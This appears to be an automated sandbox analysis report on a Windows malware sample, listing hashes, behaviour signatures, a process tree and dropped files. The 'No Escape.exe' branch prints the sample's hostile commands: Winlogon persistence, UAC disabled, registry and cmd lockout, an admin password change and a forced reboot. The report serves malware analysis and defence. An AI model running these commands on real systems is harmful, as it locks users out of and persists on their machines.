Resubmissions

31/03/2025, 16:20

250331-ttgcgsttbw 10

31/03/2025, 15:33

250331-sy8rvssxgz 10

31/03/2025, 15:30

250331-sxh5tasxfs 3

Analysis

  • max time kernel
    111s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 16:20

Errors

Reason
Machine shutdown

General

  • Target

    EasyInstallerV2.exe

  • Size

    954KB

  • MD5

    7dc8bd5f288db84de1673551e097091c

  • SHA1

    74dc9cb4c1e34fa9fbdfd9f1368517136592ba4f

  • SHA256

    68310e7362e3f6a42dfd3f30b1664d5bce98045d606ba9e321ae5a2aa12fb034

  • SHA512

    57d7c3edd1de49aab4c83171adce94f2ef2b02a8ecc39db6f0e88f4541839f181e8b2b9a11b96f063577a3268796e55663473db533b2987fe9ea07ce8573f759

  • SSDEEP

    12288:uLXxYS9cj/sTS9cj/ssFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDi:u7zMTMNNd+g5Wk78GBBjgrIQtDg

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\EasyInstallerV2.exe
    "C:\Users\Admin\AppData\Local\Temp\EasyInstallerV2.exe"
    1⤵
      PID:3560
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa51fbdcf8,0x7ffa51fbdd04,0x7ffa51fbdd10
        2⤵
          PID:3532
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1956 /prefetch:2
          2⤵
            PID:1820
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1612,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2092 /prefetch:3
            2⤵
              PID:4328
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2580 /prefetch:8
              2⤵
                PID:4080
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3060 /prefetch:1
                2⤵
                  PID:4444
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3040,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3104 /prefetch:1
                  2⤵
                    PID:3260
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4300 /prefetch:2
                    2⤵
                      PID:4724
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4724,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4752 /prefetch:1
                      2⤵
                        PID:2120
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:8
                        2⤵
                          PID:3592
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5408,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5424 /prefetch:8
                          2⤵
                            PID:4856
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5372,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5416 /prefetch:8
                            2⤵
                              PID:4816
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
                              2⤵
                                PID:2424
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5368,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5624 /prefetch:8
                                2⤵
                                  PID:1596
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5724,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5696 /prefetch:8
                                  2⤵
                                    PID:2380
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5896,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5912 /prefetch:1
                                    2⤵
                                      PID:696
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3540,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3100 /prefetch:8
                                      2⤵
                                        PID:5256
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3588,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3520 /prefetch:8
                                        2⤵
                                          PID:5264
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3692,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5796 /prefetch:8
                                          2⤵
                                            PID:5272
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4384,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5820 /prefetch:2
                                            2⤵
                                              PID:5460
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3640,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3668 /prefetch:1
                                              2⤵
                                                PID:2464
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6140,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5992 /prefetch:1
                                                2⤵
                                                  PID:5544
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5652,i,9929275389758806298,11635198449161792636,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6304 /prefetch:8
                                                  2⤵
                                                    PID:5816
                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                  1⤵
                                                    PID:2452
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:4172
                                                    • C:\Windows\system32\taskmgr.exe
                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                      1⤵
                                                      • Checks SCSI registry key(s)
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:1172
                                                    • C:\Windows\System32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                      1⤵
                                                        PID:3232
                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_NO-ESCAPE-main.zip\NO-ESCAPE-main\No Escape.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_NO-ESCAPE-main.zip\NO-ESCAPE-main\No Escape.exe"
                                                        1⤵
                                                        • Drops file in Program Files directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2240
                                                        • C:\Windows\system32\wscript.exe
                                                          "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BED.tmp\BEE.tmp\BEF.vbs //Nologo
                                                          2⤵
                                                          • Checks computer location settings
                                                          PID:5968
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
                                                            3⤵
                                                              PID:4884
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +s +h C:\msg.exe
                                                                4⤵
                                                                • Sets file to hidden
                                                                • Views/modifies file attributes
                                                                PID:6040
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +s +h C:\launch.exe
                                                                4⤵
                                                                • Sets file to hidden
                                                                • Views/modifies file attributes
                                                                PID:6056
                                                              • C:\Windows\regedit.exe
                                                                regedit /s hello.reg
                                                                4⤵
                                                                • Runs .reg file with regedit
                                                                PID:6068
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
                                                                4⤵
                                                                  PID:6096
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
                                                                  4⤵
                                                                  • Modifies WinLogon for persistence
                                                                  PID:6104
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
                                                                  4⤵
                                                                  • Sets desktop wallpaper using registry
                                                                  PID:6128
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
                                                                  4⤵
                                                                    PID:4924
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                    4⤵
                                                                    • UAC bypass
                                                                    PID:724
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
                                                                    4⤵
                                                                      PID:6136
                                                                    • C:\Windows\system32\reg.exe
                                                                      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                      4⤵
                                                                      • Disables RegEdit via registry modification
                                                                      • Modifies registry key
                                                                      PID:3860
                                                                    • C:\Windows\system32\net.exe
                                                                      net user Admin death
                                                                      4⤵
                                                                        PID:3248
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user Admin death
                                                                          5⤵
                                                                            PID:5244
                                                                        • C:\Windows\system32\shutdown.exe
                                                                          shutdown /t 0 /r
                                                                          4⤵
                                                                            PID:4644
                                                                    • C:\Windows\system32\LogonUI.exe
                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa38f5855 /state1:0x41c64e6d
                                                                      1⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:312

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Program Files (x86)\date.txt

                                                                      Filesize

                                                                      120B

                                                                      MD5

                                                                      255a8e245b6ad378558b90cbe3dbc3d0

                                                                      SHA1

                                                                      6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

                                                                      SHA256

                                                                      d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

                                                                      SHA512

                                                                      67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

                                                                    • C:\Program Files (x86)\hello.bat

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      b86fddd2b764f079615be5d4dc3e158d

                                                                      SHA1

                                                                      2510479054db1fe52cc2dcd3c7033d91204cb367

                                                                      SHA256

                                                                      2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

                                                                      SHA512

                                                                      915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

                                                                    • C:\Program Files (x86)\hello.jpg

                                                                      Filesize

                                                                      110KB

                                                                      MD5

                                                                      057ea45c364eb2994808a47b118556a2

                                                                      SHA1

                                                                      1d48c9c15ea5548af1475b5a369a4f7b8db42858

                                                                      SHA256

                                                                      6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

                                                                      SHA512

                                                                      582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

                                                                    • C:\Program Files (x86)\hello.reg

                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      81427e9d5d10657b9edffd22e7b405bb

                                                                      SHA1

                                                                      f27ab62f77f827dbb32c66a35ac48006c47f4374

                                                                      SHA256

                                                                      bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

                                                                      SHA512

                                                                      b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

                                                                    • C:\Program Files (x86)\launch.exe

                                                                      Filesize

                                                                      92KB

                                                                      MD5

                                                                      b4acc41d0e55b299ffeec11a8a20cf08

                                                                      SHA1

                                                                      bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

                                                                      SHA256

                                                                      34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

                                                                      SHA512

                                                                      d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

                                                                    • C:\Program Files (x86)\msg.exe

                                                                      Filesize

                                                                      9KB

                                                                      MD5

                                                                      331a0667b11e02330357565427dc1175

                                                                      SHA1

                                                                      d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

                                                                      SHA256

                                                                      fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

                                                                      SHA512

                                                                      1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                      Filesize

                                                                      649B

                                                                      MD5

                                                                      049cca23e825cb57929bc6f70edc2e73

                                                                      SHA1

                                                                      b308d0077ada4956a3b0b6a6bb1f9eff82676821

                                                                      SHA256

                                                                      ceb225fcace9a19199fac5bb763f89fe6a43bbf3b840b92a80fd5616b0bf0699

                                                                      SHA512

                                                                      d075d0df3508bf34a0ae326047055dafb4738b53a794c5a8416fd70e02e88309b04b5ac4d725f79ac82528871f120b14272b3c032f71e62156153a1acd1d0a5c

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

                                                                      Filesize

                                                                      732KB

                                                                      MD5

                                                                      9172731ba3f16b578bcb14000ccbccd4

                                                                      SHA1

                                                                      e7ab716661ed88ecf060dc5d53720877b141eac9

                                                                      SHA256

                                                                      ce0a32e35b7c79e7e2ffe7bd3c7566a6fb843341268ad50f4a594e56e17a5110

                                                                      SHA512

                                                                      3a35995b6dadf408ca69699220120bba5f70fb3c2a850165ab11dad03821c8ce316bf7e9662f8976e0bf659cdb9adf0c8d0d7beca22b59480e4830dc5e02666c

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                      Filesize

                                                                      120B

                                                                      MD5

                                                                      e9e8d99078a40b21cf7326bc42e71762

                                                                      SHA1

                                                                      fde047a0b4c68439923788e15893b52cc27d599a

                                                                      SHA256

                                                                      163f8c58a022a98c4f8021fdc35eb61dbe7e8d42f8f0a678f9a490e7fa78d54c

                                                                      SHA512

                                                                      d7e84af38068015314ae2b0381a6d7b0322f9fc136e81d3442dd21cb28e825e67902dbb432a0b55712b7b96ae56d7103106872c39b791a14566bf33de10393d5

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      6c5da2a839178479408a96b1b357f4ea

                                                                      SHA1

                                                                      28679d81afa77e0f02cdddde12d5ba9912455e32

                                                                      SHA256

                                                                      78e1b02c3ffbf19adb54cb2bc79fd84374c73a7648e2c14e954a44184f27b305

                                                                      SHA512

                                                                      60db3e9d20557cad43446e0b90e3961cb8e635657b508cb72be7a9146296cea98fca07526ed3481289b0eb55692ce2957a5012f6ee96943733feabb654a15a47

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.90.1_0\dasherSettingSchema.json

                                                                      Filesize

                                                                      854B

                                                                      MD5

                                                                      4ec1df2da46182103d2ffc3b92d20ca5

                                                                      SHA1

                                                                      fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                      SHA256

                                                                      6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                      SHA512

                                                                      939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                      Filesize

                                                                      5KB

                                                                      MD5

                                                                      fb28c15fe9f6aa40bbc905dd472ccfcb

                                                                      SHA1

                                                                      9da6d5d2ee20002602219c088bb2869d92da2c27

                                                                      SHA256

                                                                      908acea9b93e3eef603f4e0a8d1eb21dfbdeb21b35a87abab69ba12f9d60e6b8

                                                                      SHA512

                                                                      88edf827ecf5674e5375703adb71771ab2027a3a02dec1a03cc1ed32c68adc95373fad63dc1d61b0a4fb6f9c23e2d54dffe04402428ec5ef172725c153ef9caa

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                      Filesize

                                                                      2B

                                                                      MD5

                                                                      d751713988987e9331980363e24189ce

                                                                      SHA1

                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                      SHA256

                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                      SHA512

                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      3412fb7d49a7d83fb9d2ed092e2b5e5b

                                                                      SHA1

                                                                      36c2d3ee940b5ee4dd9903efce9e3936a58ff48a

                                                                      SHA256

                                                                      945e2d0a9f02de97685807d569c0428505a78e1da18bf511913a9ca46cbeb451

                                                                      SHA512

                                                                      c6399309ec373a85ccb7d143698314f05f3dc103e76a181367f4f60f915cffc2447657dbff18d988b7b3b42ae7a2fdd25ca199a31568027e049bd09c66c0c0d1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      12KB

                                                                      MD5

                                                                      e9617b2faf108c259e7dd365e684e929

                                                                      SHA1

                                                                      bdee79a3217b0361ddc18e558943f56ebb597762

                                                                      SHA256

                                                                      ee3892029e160c9591fef0335ae215e7439977b238ed42564919a54da46ec29f

                                                                      SHA512

                                                                      951a32c7a6072aba256a18e11d7d07059c7f8ac78e079d4a564999737143697394afb582a8652b1a0eadda7229c9e12491dfef52997afea485a55cc30525efa2

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      6f86f2b4dbf1b3312dfa4a49e1195c12

                                                                      SHA1

                                                                      d2a00031256a8e5e87dc012ba1980961bee407df

                                                                      SHA256

                                                                      08b9aa9698dbcaca26111106436d6ce897b00f1849bd3c9fb817af5c4700ce8b

                                                                      SHA512

                                                                      4ef1f0d849c1e7f1f675e85c438da6a39ecc0686f1277b1f69b965184e3555abcedadf11b2c54389de41ec89b47c330084dfd3ca09881205fe2c3cb8dc9688e2

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      12KB

                                                                      MD5

                                                                      792f74286d56a8c8f8455639af42e73f

                                                                      SHA1

                                                                      918439638eb2b1e73bddb4e5ca45c8e3399bf5bc

                                                                      SHA256

                                                                      bdf94b78790ac2e1dcc220848aaa27db2c93871ee19bafa7d7bcc3ec59760a73

                                                                      SHA512

                                                                      30f3ef2d94d01fbcf9e26c7204a2f9837d8a8c2f9bf990441437843ef7ededb10284cd3ee6a1be9ee357abdf3a628a87eeacf568a106f63eeffa420013671f5c

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      76c4a874d1825b07a164ac7c931c8a56

                                                                      SHA1

                                                                      d9ec0a83699def2bcc8094cfbde0adac2be1451c

                                                                      SHA256

                                                                      7dca92327cf2b43f4cde9af3ff06854749f16d36ba5db145151f87bd47894f79

                                                                      SHA512

                                                                      04c055f4ccf211b023bbc5e6ec7217f7fd75222724cbccfc5a0c77b2fe064bc77095e51dae9227b504121f58b0b0cce2eb61df030ddd95430b9a777cee85f995

